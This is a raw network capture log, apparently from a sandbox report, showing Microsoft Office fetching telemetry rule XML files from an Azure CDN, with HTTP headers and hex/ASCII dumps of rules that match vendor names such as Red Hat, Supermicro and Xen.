                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:49 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:49 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                      x-ms-request-id: 6fd3b960-801e-00ac-6c64-3bfd65000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052349Z-178bfbc474bgvl54hC1NYCsfuw000000013g000000000rwr
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:49 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      77192.168.2.64979013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:49 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:49 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:49 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                      ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                      x-ms-request-id: 1a8bda6d-001e-002b-2468-3b99f2000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052349Z-178bfbc474bscnbchC1NYCe7eg000000016g000000007xk0
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:49 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      78192.168.2.64979113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:50 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:51 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:50 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                                                                                      x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052350Z-178bfbc474bvjk8shC1NYC83ns00000000y00000000038et
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:51 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      79192.168.2.64979313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:50 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:50 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 432
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                      x-ms-request-id: 41283c59-801e-0015-058c-3af97f000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052350Z-1777c6cb754wcxkwhC1TEB3c6w0000000ahg00000000cgnr
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:51 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      80192.168.2.64979213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:50 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:51 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:51 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                                                                                      x-ms-request-id: 925146da-101e-0034-3f87-3b96ff000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052351Z-1777c6cb754xrr98hC1TEB3kag0000000ag000000000992p
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:51 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      81192.168.2.64980313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:51 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:51 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:51 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                      x-ms-request-id: 9a395038-201e-0071-807e-3bff15000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052351Z-1777c6cb754ww792hC1TEBzqu40000000ae000000000f8wc
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:51 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      82192.168.2.64980213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:51 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:51 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                                                                                      x-ms-request-id: 5c5a59ff-301e-003f-5b8c-3a266f000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052351Z-1777c6cb7549x5qchC1TEBggbg0000000ap000000000fevr
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:51 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      83192.168.2.64980613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:52 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:53 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                                                                                      x-ms-request-id: 1a92378f-b01e-005c-6f7b-3b4c66000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052353Z-1777c6cb754xjpthhC1TEBexs80000000abg00000000tzyd
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:53 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      84192.168.2.64980513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:52 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:53 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                      x-ms-request-id: d5b120ed-d01e-0017-3f65-3bb035000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052353Z-178bfbc474bwh9gmhC1NYCy3rs000000012000000000ev74
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:53 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      85192.168.2.64980713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:52 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:53 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 405
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                      ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                      x-ms-request-id: 964846c7-701e-001e-36c3-3bf5e6000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052353Z-1777c6cb754lvj6mhC1TEBke940000000as00000000063zg
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:53 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
